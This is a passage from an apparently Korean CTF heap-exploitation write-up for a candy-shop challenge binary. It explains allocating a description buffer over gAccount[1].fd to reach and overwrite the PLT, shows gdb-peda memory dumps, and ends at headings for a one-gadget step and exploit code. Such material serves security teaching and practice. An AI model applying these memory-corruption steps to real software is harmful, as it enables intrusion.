...
- 다음과 같이 gAccount[] 영역을 할당 받을 수 있습니다.
- 조금 전에 추가한 사탕을 모두 구매합니다.
- 공격자는 Order list에 사탕을 추가하고, 주문을 완료합니다.
- 이때 캔디 설명을 입력 받는 영역으로 gAccount[1].fd영역이 할당됩니다.
- 이로 인해 plt 영역에 접근하여 값을 변경할 수 있습니다.
| Code Block |
|---|
Breakpoint 1, 0x000000000040123a in ?? ()
gdb-peda$ ni
0x000000000040123f in ?? ()
gdb-peda$ i r rax
rax 0x604250 0x604250
gdb-peda$ x/4gx 0x604250
0x604250: 0x00007f070160bbf8 0x0000000000604268
0x604260: 0x0000000000000003 0x0000000000000003
Breakpoint 2, 0x000000000040125f in ?? ()
gdb-peda$ x/4gx 0x604250
0x604250: 0x0a41414141414141 0x0000000000604268
0x604260: 0x0000000000000003 0x0000000000000003
gdb-peda$ |
One Gadget
| Panel |
|---|
Exploit Code
...